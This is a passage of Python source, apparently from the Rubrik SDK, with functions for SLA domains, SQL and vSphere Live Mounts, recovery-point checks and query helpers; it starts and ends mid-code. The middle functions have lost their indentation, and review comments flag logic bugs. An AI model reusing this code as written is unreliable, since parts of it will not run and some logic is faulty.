                config["frequencies"]["monthly"] = {}
                # Fixed anchor days: monthly snapshots anchor to the last day
                # of the month, yearly to the last day of January-start years.
                config["frequencies"]["monthly"]["dayOfMonth"] = "LastDay"
                config["frequencies"]["monthly"]["frequency"] = monthly_frequency
                config["frequencies"]["monthly"]["retention"] = monthly_retention
            if yearly_frequency is not None:
                config["frequencies"]["yearly"] = {}
                config["frequencies"]["yearly"]["yearStartMonth"] = "January"
                config["frequencies"]["yearly"]["dayOfYear"] = "LastDay"
                config["frequencies"]["yearly"]["frequency"] = yearly_frequency
                config["frequencies"]["yearly"]["retention"] = yearly_retention
        else:
            # Create the config for v1 endpoint
            # v1 models the frequencies as a flat list of timeUnit entries.
            frequencies = []
            if hourly_frequency is not None:
                frequencies.append({
                    "timeUnit": "Hourly",
                    "frequency": hourly_frequency,
                    "retention": hourly_retention
                })
            if daily_frequency is not None:
                frequencies.append({
                    "timeUnit": "Daily",
                    "frequency": daily_frequency,
                    "retention": daily_retention
                })
            if monthly_frequency is not None:
                frequencies.append({
                    "timeUnit": "Monthly",
                    "frequency": monthly_frequency,
                    "retention": monthly_retention
                })
            if yearly_frequency is not None:
                frequencies.append({
                    "timeUnit": "Yearly",
                    "frequency": yearly_frequency,
                    "retention": yearly_retention
                })
            config["frequencies"] = frequencies
        if archive_name is not None:
            archival_location_id = self.object_id(
                archive_name, "archival_location", timeout=timeout)
            # convert retention in days to seconds
            retention_on_brik_in_seconds = retention_on_brik_in_days * 86400
            # Instant archive uploads snapshots (almost) immediately, so the
            # archival threshold collapses to 1 second.
            if instant_archive is False:
                archival_threshold = retention_on_brik_in_seconds
            else:
                archival_threshold = 1
            config["localRetentionLimit"] = retention_on_brik_in_seconds
            config["archivalSpecs"] = [{
                "locationId": archival_location_id,
                "archivalThreshold": archival_threshold
            }]
        if sla_id is not False:
            # An SLA with this name already exists: fetch its configuration and
            # compare (after stripping server-populated keys) for idempotency.
            self.log(
                "create_sla: Getting the configuration details for the SLA Domain {} already on the Rubrik cluster.".format(name))
            if v2_sla is True:
                current_sla_details = self.get(
                    "v2", "/sla_domain/{}".format(sla_id), timeout=timeout)
            else:
                current_sla_details = self.get(
                    "v1", "/sla_domain/{}".format(sla_id), timeout=timeout)
            # Keys populated by the cluster that are not part of the desired
            # configuration and must be excluded from the comparison.
            keys_to_delete = [
                "id",
                "primaryClusterId",
                "allowedBackupWindows",
                "firstFullAllowedBackupWindows",
                "archivalSpecs",
                "replicationSpecs",
                "numDbs",
                "numOracleDbs",
                "numFilesets",
                "numHypervVms",
                "numNutanixVms",
                "numManagedVolumes",
                "numStorageArrayVolumeGroups",
                "numWindowsVolumeGroups",
                "numLinuxHosts",
                "numShares",
                "numWindowsHosts",
                "numVms",
                "numEc2Instances",
                "numVcdVapps",
                "numProtectedObjects",
                "isDefault",
                "uiColor",
                "maxLocalRetentionLimit",
                "showAdvancedUi",
                "advancedUiConfig"]
            if archive_name is not None:
                # Keep archivalSpecs in the comparison when an archive was requested.
                keys_to_delete.remove("archivalSpecs")
                # NOTE(review): this overwrites the cluster's localRetentionLimit
                # with archival_threshold before comparing. When instant_archive
                # is True, archival_threshold is 1 while config carries
                # retention_on_brik_in_seconds, so the comparison can never match
                # -- confirm whether retention_on_brik_in_seconds was intended here.
                current_sla_details["localRetentionLimit"] = archival_threshold
            for key in keys_to_delete:
                try:
                    del current_sla_details[key]
                except KeyError:
                    # The key may be absent depending on CDM version; ignore.
                    pass
            if config == current_sla_details:
                return "No change required. The {} SLA Domain is already configured with the provided configuration.".format(
                    name)
            else:
                raise InvalidParameterException(
                    "The Rubrik cluster already has an SLA Domain named '{}' whose configuration does not match the values provided.".format(name))
        self.log("create_sla: Creating the new SLA")
        if v2_sla is True:
            return self.post("v2", "/sla_domain", config, timeout=timeout)
        else:
            return self.post("v1", "/sla_domain", config, timeout=timeout)
def delete_sla(self, name, timeout=15):
"""Delete an SLA from the Rubrik Cluster
Arguments:
name {[type]} -- The name of the SLA you wish to delete.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection to the Rubrik cluster. (default: {15})
Returns:
dict -- The full API response for `DELETE /v1/sla_domain`.
dict -- The full API response for `DELETE /v2/sla_domain`.
"""
self.function_name = inspect.currentframe().f_code.co_name
try:
# object_id() will set sla_already_present to something besides False if the SLA is already on the cluter
sla_id = self.object_id(name, "sla", timeout=timeout)
except InvalidParameterException:
return "No change required. The SLA Domain '{}' is not on the Rubrik cluster.".format(name)
try:
self.log("delete_sla: Attempting to delete the SLA using the v1 API")
delete_sla = self.delete("v1", "/sla_domain/{}".format(sla_id))
except APICallException as api_response:
if "SLA Domains created/updated using v2 rest api version cannot be deleted from v1" in str(api_response):
self.log(
"delete_sla: SLA Domains created with the v2 endpoint can not be deleted by the v1 endpoint. Attempting to delete the SLA using the v2 API")
delete_sla = self.delete("v2", "/sla_domain/{}".format(sla_id))
else:
raise APICallException(api_response)
return delete_sla
def _time_in_range(self, start, end, point_in_time):
"""Checks if a specific datetime exists in a start and end time. For example:
checks if a recovery point exists in the available snapshots
Arguments:
start {datetime} -- The start time of the recoverable range the database can be mounted from.
end {datetime} -- The end time of the recoverable range the database can be mounted from.
point_in_time {datetime} -- The point_in_time you wish to Live Mount.
Returns:
bool -- True if point_in_time is in the range [start, end]."""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
if start <= end:
return start <= point_in_time <= end
else:
return start <= point_in_time or point_in_time <= end
def sql_live_mount(self, db_name, sql_instance, sql_host, mount_name, date='latest', time='latest', timeout=30): # pylint: ignore
"""Live Mount a database from a specified recovery point.
Arguments:
db_name {str} -- The name of the database to Live Mount.
sql_instance {str} -- The SQL instance name with the database you wish to Live Mount.
sql_host {str} -- The SQL Host of the database/instance to Live Mount.
mount_name {str} -- The name given to the Live Mounted database i.e. AdventureWorks_Clone.
Keyword Arguments:
date {str} -- The recovery_point date to recovery to formated as `Month-Day-Year` (ex: 1-15-2014). If `latest` is specified, the last snapshot taken will be used. (default: {'latest'})
time {str} -- The recovery_point time to recovery to formated as `Hour:Minute AM/PM` (ex: 1:30 AM). If `latest` is specified, the last snapshot taken will be used. (default: {'latest'})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `POST /v1/mssql/db/{id}/mount`.
"""
if date != 'latest' and time == 'latest' or date == 'latest' and time != 'latest':
raise InvalidParameterException(
"The date and time arguments most both be 'latest' or a specific date and time.")
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
recovery_point = self._validate_sql_recovery_point(
mssql_id, date, time)
try:
if not recovery_point['is_recovery_point']:
raise InvalidParameterException(
"The database '{}' does not have a recovery_point taken on {} at {}.".format(
db_name, date, time))
except NameError:
pass
else:
config = {}
config['recoveryPoint'] = {
'timestampMs': recovery_point['recovery_timestamp']}
config['mountedDatabaseName'] = mount_name
self.log(
"sql_live_mount: Live Mounting the database from recovery_point on {} at {} as database '{}'.".format(
date,
time,
mount_name))
return self.post('v1', '/mssql/db/{}/mount'.format(mssql_id), config, timeout)
def vsphere_live_unmount(self, mounted_vm_name, force=False, timeout=30): # pylint: ignore
"""Delete a vSphere Live Mount from the Rubrik cluster.
Arguments:
mounted_vm_name {str} -- The name of the Live Mounted vSphere VM to be unmounted.
Keyword Arguments:
force {bool} -- Force unmount to remove metadata when the datastore of the Live Mount virtual machine was moved off of the Rubrik cluster. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `DELETE '/vmware/vm/snapshot/mount/{id}?force={bool}'.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log("vsphere_live_unmount: Searching the Rubrik cluster for the Live Mount vSphere VM '{}'.".format(
mounted_vm_name))
mounted_vm_id = self.object_id(
mounted_vm_name, 'vmware', timeout=timeout)
self.log(
"vsphere_live_unmount: Getting the vSphere VM mount information from the Rubrik cluster.")
mount_summary = self.get(
'v1', '/vmware/vm/snapshot/mount', timeout=timeout)
self.log("vsphere_live_unmount: Getting the mount ID of the vSphere VM '{}'.".format(
mounted_vm_name))
for mountedvm in mount_summary['data']:
if mountedvm['mountedVmId'] == mounted_vm_id:
mount_id = mountedvm['id']
break
else:
raise InvalidParameterException(
"The mounted vSphere VM '{}' does not exist, please provide a valid instance".format(mounted_vm_name))
try:
mount_id
except NameError:
raise InvalidParameterException("The mounted vSphere VM '{}' does exist, please check the name you provided.".format(
mounted_vm_name))
else:
self.log(
"vsphere_live_unmount: Unmounting the vSphere VM '{}'.".format(mounted_vm_name))
return self.delete('v1', '/vmware/vm/snapshot/mount/{}?force={}'.format(mount_id, force), timeout)
def sql_live_unmount(self, mounted_db_name, sql_instance=None, sql_host=None, force=False, timeout=30): # pylint: ignore
"""Delete a Microsoft SQL Live Mount from the Rubrik cluster.
Arguments:
mounted_db_name {str} -- The name of the Live Mounted database to be unmounted.
Keyword Arguments:
sql_instance {str} -- The name of the MSSQL instance managing the Live Mounted database to be unmounted.
sql_host {str} -- The name of the MSSQL host running the Live Mounted database to be unmounted.
force {bool} -- Remove all data within the Rubrik cluster related to the Live Mount, even if the SQL Server database cannot be contacted. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `DELETE /mssql/db/mount/{id}?force={bool}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
mounted_db_id = self._validate_sql_db(
mounted_db_name, sql_instance, sql_host)
self.log(
"sql_live_unmount: Getting the MSSQL mount information from the Rubrik cluster.")
mount_summary = self.get('v1', '/mssql/db/mount', timeout=timeout)
self.log("sql_live_unmount: Getting the mount ID of the mounted database '{}'.".format(
mounted_db_name))
for mounteddb in mount_summary['data']:
if mounteddb['mountedDatabaseId'] == mounted_db_id:
mount_id = mounteddb['id']
try:
mount_id
except NameError:
raise InvalidParameterException("A mount ID for '{}' does exist, please provide a valid Live Mounted database.".format(
mounted_db_name))
else:
self.log(
"sql_live_unmount: Unmounting the database '{}'.".format(mounted_db_name))
return self.delete('v1', '/mssql/db/mount/{}?force={}'.format(mount_id, force), timeout)
def get_vsphere_live_mount(self, vm_name, timeout=15): # pylint: ignore
"""Get existing Live Mounts for a vSphere VM.
Arguments:
vm_name {str} -- The name of the mounted vSphere VM.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm/snapshot/mount?vm_id={vm_id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"get_vsphere_live_mount: Searching the Rubrik cluster for the mounted vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"get_vsphere_live_mount: Getting Live Mounts of vSphere VM {}.".format(vm_name))
return self.get('v1', '/vmware/vm/snapshot/mount?vm_id={}'.format(vm_id), timeout)
def get_vsphere_live_mount_names(self, vm_name, timeout=15): # pylint: ignore
"""Get existing Live Mount VM name(s) for a vSphere VM.
Arguments:
vm_name {str} -- The name of the mounted vSphere VM.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
list -- A list of the Live Mounted VM names.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log("get_vsphere_live_mount_names: Searching the Rubrik cluster for the mounted vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"get_vsphere_live_mount_names: Getting Live Mounts of vSphere VM {}.".format(vm_name))
mounted_vm = self.get(
'v1', '/vmware/vm/snapshot/mount?vm_id={}'.format(vm_id), timeout)
mounted_vm_name = []
for vm in mounted_vm['data']:
try:
vm_moid = vm['mountedVmId']
split_moid = vm_moid.split('-')
moid = split_moid[-2] + '-' + split_moid[-1]
self.log(
"get_vsphere_live_mount_names: Getting summary of VM with moid '{}'.".format(moid))
vm_data = self.get(
'v1', '/vmware/vm?moid={}'.format(moid), timeout)
mounted_vm_name.append(vm_data['data'][0]['name'])
except KeyError:
self.log(
"get_vsphere_live_mount_names: A Live Mount of vSphere VM '{}' is in progress.".format(vm_name))
continue
return mounted_vm_name
def _validate_sql_db(self, db_name, sql_instance, sql_host, timeout=30): # pylint: ignore
"""Checks whether a database exist on an SQL Instance and Host.
Arguments:
db_name {str} -- The name of the database.
sql_instance {str} -- The SQL instance.
sql_host {str} -- The SQL server hostname.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- The ID of the MSSQL database.
"""
self.function_name = inspect.currentframe().f_code.co_name
mssql_host_id = self.object_id(
sql_host, 'physical_host', timeout=timeout)
self.log(
"_validate_sql_db: Getting the list of instances on host {}.".format(sql_host))
mssql_instance = self.get(
'v1', '/mssql/instance?primary_cluster_id=local&root_id={}'.format(mssql_host_id), timeout=timeout)
for instance in mssql_instance['data']:
if instance['name'] == sql_instance:
sql_instance_id = instance['id']
break
else:
raise InvalidParameterException(
"The SQL instance {} does not exist, please provide a valid instance".format(sql_instance))
self.log(
"_validate_sql_db: Getting the list of databases on the instance {}, on host {}.".format(
sql_instance,
sql_host))
mssql_db = self.get(
'v1',
'/mssql/db?primary_cluster_id=local&instance_id={}'.format(
sql_instance_id),
timeout=timeout)
for db in mssql_db['data']:
if db['name'] == db_name:
mssql_id = db['id']
break
else:
raise InvalidParameterException(
"The database {} does not exist, please provide a valid database".format(db_name))
return mssql_id
def get_sql_live_mount(self, db_name, sql_instance=None, sql_host=None, timeout=30): # pylint: ignore
"""Retrieve the Live Mounts for a MSSQL source database.
Arguments:
db_name {str} -- The name of the source database with Live Mounts.
Keyword Arguments:
sql_instance {str} -- The SQL instance name of the source database.
sql_host {str} -- The SQL host name of the source database/instance.
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `GET /v1/mssql/db/mount?source_database_id={id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
self.log(
"get_sql_live_mount: Getting the live mounts for mssql db id'{}'.".format(mssql_id))
return self.get('v1', '/mssql/db/mount?source_database_id={}'.format(mssql_id), timeout)
def _validate_sql_recovery_point(self, mssql_id, date, time, timeout=30): # pylint: ignore
"""Check whether the data and time provided is a valid recovery point for an MSSQL database
Arguments:
mssql_id {str} -- The ID of the database.
date {str} -- The recovery_point date formated as `Month-Day-Year` (ex: 1-15-2014).
time {str} -- The recovery_point time formated as `Hour:Minute AM/PM` (ex: 1:30 AM).
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- A dictionary with values {'is_recovery_point': bool, 'recovery_timestamp': datetime}.
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
is_recovery_point = False
if date and time == 'latest':
latest_data = self.get(
'v1', '/mssql/db/{}/snapshot'.format(mssql_id), timeout=timeout)
try:
latest_date_time = latest_data['data'][0]['date']
except:
raise InvalidParameterException(
"The database with ID {} does not have any existing snapshots.".format(mssql_id))
# Parsing latest snapshot time string value to a datetime object as YYYY-MM-DDTHH:MM
data_str = datetime.strptime(
latest_date_time[:16], '%Y-%m-%dT%H:%M')
# Create date & time strings from datetime object as MM-DD-YYYY & HH:MM AM/PM
date_str, time_str = [data_str.strftime(
'%m-%d-%Y'), data_str.strftime('%I:%M %p')]
# Convert the date & time to cluster timezone, see _date_time_conversion function for details
recovery_date_time = self._date_time_conversion(date_str, time_str)
# Parse again to datetime object
recovery_date_time = datetime.strptime(
recovery_date_time, '%Y-%m-%dT%H:%M')
# Create recovery timestamp in (ms) as integer from datetime object
recovery_timestamp = int(recovery_date_time.strftime('%s')) * 1000
is_recovery_point = True
else:
self.log(
"_validate_sql_recovery_point: Getting the recoverable range for db ID:'{}'.".format(mssql_id))
range_summary = self.get(
'v1', '/mssql/db/{}/recoverable_range'.format(mssql_id), timeout=timeout)
self.log(
"_validate_sql_recovery_point: Converting the provided date/time into UTC.")
# Convert the date & time to cluster timezone, see _date_time_conversion function for details
recovery_date_time = self._date_time_conversion(date, time)
# Parse to datetime object
recovery_date_time = datetime.strptime(
recovery_date_time, '%Y-%m-%dT%H:%M')
# Create recovery timestamp in (ms) as integer from datetime object
recovery_timestamp = int(recovery_date_time.strftime('%s')) * 1000
for range in range_summary['data']:
start_str, end_str = [range['beginTime'], range['endTime']]
# Parsing the range beginTime and endTime values to a datetime object as YYYY-MM-DDTHH:MM
start, end = [datetime.strptime(start_str[:16], '%Y-%m-%dT%H:%M'),
datetime.strptime(end_str[:16], '%Y-%m-%dT%H:%M')]
self.log(
"_validate_sql_recovery_point: Searching for the provided recovery_point.")
is_recovery_point = self._time_in_range(
start, end, recovery_date_time)
if not is_recovery_point:
continue
else:
break
return {
"is_recovery_point": is_recovery_point,
"recovery_timestamp": recovery_timestamp
}
def sql_instant_recovery(self, db_name, date, time, sql_instance=None, sql_host=None, finish_recovery=True, max_data_streams=0, timeout=30): # pylint: ignore
"""Perform an instant recovery for MSSQL database from a specified recovery point.
Arguments:
db_name {str} -- The name of the database to instantly recover.
date {str} -- The recovery_point date to recover to formated as `Month-Day-Year` (ex: 1-15-2014).
time {str} -- The recovery_point time to recover to formated as `Hour:Minute AM/PM` (ex: 1:30 AM).
Keyword Arguments:
sql_instance {str} -- The SQL instance name with the database to instantly recover.
sql_host {str} -- The SQL Host of the database/instance to instantly recover.
finish_recovery {bool} -- A Boolean value that determines the recovery option to use during database restore. When this value is 'true', the database is restored using the RECOVERY option and is fully functional at the end of the restore operation. When this value is 'false', the database is restored using the NORECOVERY option and remains in recovering mode at the end of the restore operation.
max_data_streams {int} -- Maximum number of parallel data streams that can be used to copy data to the target system.
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `POST /v1/mssql/db/{id}/restore`.
"""
self.function_name = inspect.currentframe().f_code.co_name
mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
recovery_point = self._validate_sql_recovery_point(
mssql_id, date, time)
try:
if recovery_point['is_recovery_point'] == False:
raise InvalidParameterException(
"The database '{}' does not have a recovery_point taken on {} at {}.".format(
db_name, date, time))
except NameError:
pass
else:
config = {}
config['recoveryPoint'] = {
'timestampMs': recovery_point['recovery_timestamp']}
config['finish_recovery'] = finish_recovery
config['max_data_streams'] = max_data_streams
self.log(
"sql_instant_recovery: Performing instant recovery of {} to recovery_point {} at {}.".format(
db_name,
date,
time))
return self.post('v1', '/mssql/db/{}/restore'.format(mssql_id), config, timeout)
def vcenter_refresh_vm(self, vm_name, timeout=15): # pylint: ignore
"""Refresh a single vSphere VM metadata.
Arguments:
vm_name {str} -- The name of the vSphere VM.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
no content.
"""
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"vcenter_refresh_vm: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
data = self.get('v1', '/vmware/vm?name={}'.format(vm_name), timeout)
if data['data'] == []:
raise InvalidParameterException(
"The vSphere VM '{}' does not exist.".format(vm_name))
else:
vcenter_id = data['data'][0]['infraPath'][0]['id']
vm_id = data['data'][0]['id']
self.log(
"vcenter_refresh_vm: Getting the MOID for vSphere VM {}.".format(vm_name))
split_moid = vm_id.split('-')
moid = split_moid[-2] + '-' + split_moid[-1]
config = {'vmMoid': moid}
self.log(
"vcenter_refresh_vm: Refreshing vSphere VM {} metadata.".format(vm_name))
self.post(
'internal', '/vmware/vcenter/{}/refresh_vm'.format(vcenter_id), config, timeout)
def get_vsphere_vm(self, name=None, is_relic=None, effective_sla_domain_id=None, primary_cluster_id=None, limit=None, offset=None, moid=None, sla_assignment=None, guest_os_name=None, sort_by=None, sort_order=None, timeout=15): # pylint: ignore
"""Get summary of all the VMs. Each keyword argument is a query parameter to filter the VM details returned i.e. you can query for a specific VM name, is_relic, effective_sla_domain etc.
Keyword Arguments:
name {str} -- Search by using a virtual machine name.
is_relic {bool} -- Filter by the isRelic field of the virtual machine. When this parameter is not set, return both relic and non-relic virtual machines.
effective_sla_domain_id {str} -- Filter by ID of effective SLA Domain.
primary_cluster_id {str} -- Filter by primary cluster ID, or local.
limit {int} -- Limit the number of matches returned.
offset {int} -- Ignore these many matches in the beginning.
moid {str} -- Search by using a virtual machine managed object ID.
sla_assignment {str} -- Filter by SLA Domain assignment type. (Direct, Derived, Unassigned)
guest_os_name {str} -- Filters by the name of operating system using infix search.
sort_by {str} -- Sort results based on the specified attribute. (effectiveSlaDomainName, name, moid, folderPath, infraPath)
sort_order {str} -- Sort order, either ascending or descending. (asc, desc)
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm?{query}`
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
parameters = {'effective_sla_domain_id': effective_sla_domain_id,
'primary_cluster_id': primary_cluster_id,
'limit': limit,
'offset': offset,
'is_relic': is_relic,
'name': name,
'moid': moid,
'sla_assignment': sla_assignment,
'guest_os_name': guest_os_name,
'sort_by': sort_by,
'sort_order': sort_order}
parameters = {key: value for key,
value in parameters.items() if value is not None}
self.log("get_vsphere_vm: checking the provided query parameters.")
valid_sla_assignment = ['Derived', 'Direct', 'Unassigned']
for key, value in parameters.items():
if key == 'sla_assignment' and value not in valid_sla_assignment:
raise InvalidParameterException(
'The sla_assignment parameter must be one of the following: {}'.format(valid_sla_assignment))
valid_sort_by = ['effectiveSlaDomainName',
'name', 'moid', 'folderPath', 'infraPath']
for key, value in parameters.items():
if key == 'sort_by' and value not in valid_sort_by:
raise InvalidParameterException(
'The sort_by parameter must be one of the following: {}'.format(valid_sort_by))
valid_sort_order = ['asc', 'desc']
for key, value in parameters.items():
if key == 'sort_order' and value not in valid_sort_order:
raise InvalidParameterException(
'The sort_order parameter must be one of the following: {}'.format(valid_sort_order))
for key, value in parameters.items():
if key == 'is_relic' and not isinstance(value, bool):
raise InvalidParameterException(
'The is_relic paremeter must be a boolean: True or False')
for key, value in parameters.items():
if ((key == 'limit') or (key == 'offset')) and not isinstance(value, int):
raise InvalidParameterException(
'The limit and offset paremeter must be an integer')
# String joins by iterating through the key-value pairs in the parameters dictionary and concatenating it into a query
query = '&'.join(['%s=%s' % kv for kv in parameters.items()])
self.log("get_vsphere_vm: Get summary of all the VMs.")
return self.get('v1', '/vmware/vm?{}'.format(query), timeout)
def get_vsphere_vm_snapshot(self, vm_name, timeout=15): # pylint: ignore
"""Retrieve summary information for the snapshots of a virtual machine.
Arguments:
vm_name {str} -- Name of the virtual machine.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm/{vm_id}/snapshot`
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"get_vsphere_vm_snapshot: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log("get_vsphere_vm_snapshot: Getting summary information for the snapshots of virtual machine {}".format(vm_id))
return self.get('v1', '/vmware/vm/{}/snapshot'.format(vm_id), timeout)
def get_vsphere_vm_details(self, vm_name, timeout=15): # pylint: ignore
"""Retrieve details for a virtual machine.
Arguments:
vm_name {str} -- Name of the virtual machine.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /v1/vmware/vm/{vm_id}`
"""
if self.function_name == "":
self.function_name = inspect.currentframe().f_code.co_name
self.log(
"get_vsphere_vm_details: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name))
vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)
self.log(
"get_vsphere_vm_details: Getting details of virtual machine {}".format(vm_id))
return self.get('v1', '/vmware/vm/{}'.format(vm_id), timeout)
def get_vsphere_vm_file(self, vm_name, path, timeout=15):  # pylint: ignore
    """Search a virtual machine's snapshots for a file, by full path prefix or filename prefix.

    Arguments:
        vm_name {str} -- Name of the virtual machine.
        path {str} -- The path query. Use either a path prefix or a filename prefix.

    Keyword Arguments:
        timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})

    Returns:
        dict -- The full response of `GET /v1/vmware/vm/{vm_id}/search?path={path}`
    """
    # Record this public entry point for SDK logging, but only when an
    # outer SDK call has not already claimed it.
    if self.function_name == "":
        self.function_name = inspect.currentframe().f_code.co_name

    search_message = "get_vsphere_vm_file: Searching the Rubrik cluster for the vSphere VM '{}'.".format(vm_name)
    self.log(search_message)
    vm_id = self.object_id(vm_name, 'vmware', timeout=timeout)

    file_message = "get_vsphere_vm_file: Search for file/path {} in the snapshots of a virtual machine {}".format(path, vm_id)
    self.log(file_message)

    # NOTE(review): `path` is interpolated into the query string without
    # URL-encoding -- verify callers pass values that are safe in a URL.
    search_endpoint = '/vmware/vm/{}/search?path={}'.format(vm_id, path)
    return self.get('v1', search_endpoint, timeout)
def get_sql_db(self, db_name=None, instance=None, hostname=None, availability_group=None, effective_sla_domain=None, primary_cluster_id='local', sla_assignment=None, limit=None, offset=None, is_relic=None, is_live_mount=None, is_log_shipping_secondary=None, sort_by=None, sort_order=None, timeout=15):  # pylint: ignore
    """Retrieves summary information for SQL databases. Each keyword argument is a query parameter to filter the database details returned i.e. you can query for a specific database name, hostname, instance, is_relic, effective_sla_domain etc.
    Keyword Arguments:
        db_name {str} -- Filter by a substring of the database name.
        instance {str} -- The SQL instance name of the database.
        hostname {str} -- The SQL host name of the database.
        availability_group {str} -- Filter by the name of the Always On Availability Group.
        effective_sla_domain {str} -- Filter by the name of the effective SLA Domain.
        primary_cluster_id {str} -- Filter by primary cluster ID, or local.
        sla_assignment {str} -- Filter by SLA Domain assignment type. (Direct, Derived, Unassigned)
        limit {int} -- Limit the number of matches returned.
        offset {int} -- Ignore these many matches in the beginning.
        is_relic {bool} -- Filter database summary information by the value of the isRelic field.
        is_live_mount {bool} -- Filter database summary information by the value of the isLiveMount field.
        is_log_shipping_secondary {bool} -- Filter database summary information by the value of the isLogShippingSecondary field.
        sort_by {str} -- Sort results based on the specified attribute. (effectiveSlaDomainName, name)
        sort_order {str} -- Sort order, either ascending or descending. (asc, desc)
        timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
    Returns:
        dict -- The full response of `GET /v1/mssql/db?{query}`
    Raises:
        InvalidParameterException -- When a query parameter has an invalid value or type.
    """
    if self.function_name == "":
        self.function_name = inspect.currentframe().f_code.co_name

    # Resolve the availability group name to its ID. Initializing to None up
    # front fixes a NameError in the original code when `availability_group`
    # was not provided, and the `break` keeps the first match from being
    # clobbered by later, non-matching entries.
    availability_group_id = None
    if availability_group is not None:
        self.log("get_sql_db: Searching the Rubrik cluster for the ID of the availability_group {}.".format(
            availability_group))
        ag_summary = self.get(
            'internal', '/mssql/availability_group', timeout=timeout)
        for ag in ag_summary['data']:
            if availability_group == ag['name']:
                availability_group_id = ag['id']
                break

    # Resolve the SLA Domain name to its ID.
    effective_sla_domain_id = None
    if effective_sla_domain is not None:
        self.log("get_sql_db: Searching the Rubrik cluster for the ID of the SLA Domain '{}'.".format(
            effective_sla_domain))
        effective_sla_domain_id = self.object_id(
            effective_sla_domain, 'sla', timeout=timeout)

    parameters = {'availability_group_id': availability_group_id,
                  'effective_sla_domain_id': effective_sla_domain_id,
                  'primary_cluster_id': primary_cluster_id,
                  'name': db_name,
                  'sla_assignment': sla_assignment,
                  'limit': limit,
                  'offset': offset,
                  'is_relic': is_relic,
                  'is_live_mount': is_live_mount,
                  'is_log_shipping_secondary': is_log_shipping_secondary,
                  'sort_by': sort_by,
                  'sort_order': sort_order}
    # Drop unspecified parameters so they are not sent to the API.
    parameters = {key: value for key,
                  value in parameters.items() if value is not None}

    self.log("get_sql_db: checking the provided query parameters.")
    valid_sla_assignment = ['Derived', 'Direct', 'Unassigned']
    if 'sla_assignment' in parameters and parameters['sla_assignment'] not in valid_sla_assignment:
        raise InvalidParameterException(
            'The sla_assignment parameter must be one of the following: {}'.format(valid_sla_assignment))
    valid_sort_by = ['effectiveSlaDomainName', 'name']
    if 'sort_by' in parameters and parameters['sort_by'] not in valid_sort_by:
        raise InvalidParameterException(
            'The sort_by parameter must be one of the following: {}'.format(valid_sort_by))
    valid_sort_order = ['asc', 'desc']
    if 'sort_order' in parameters and parameters['sort_order'] not in valid_sort_order:
        raise InvalidParameterException(
            'The sort_order parameter must be one of the following: {}'.format(valid_sort_order))
    for key in ('is_relic', 'is_live_mount', 'is_log_shipping_secondary'):
        if key in parameters and not isinstance(parameters[key], bool):
            raise InvalidParameterException(
                'The is_relic, is_live_mount, is_log_shipping_secondary paremeter must be a boolean: True or False')
    for key in ('limit', 'offset'):
        if key in parameters and not isinstance(parameters[key], int):
            raise InvalidParameterException(
                'The limit and offset paremeter must be an integer')

    # String joins by iterating through the key-value pairs in the parameters dictionary and concatenating it into a query
    query = '&'.join(['%s=%s' % kv for kv in parameters.items()])
    self.log(
        "get_sql_db: Get summary of all the databases returned by the query.")
    databases = self.get('v1', '/mssql/db?{}'.format(query), timeout)

    # `instance` and `hostname` cannot be passed to the API directly, so
    # filter the response client-side. The original implementation's
    # try/for/else blocks overwrote `result` with a comprehension that used
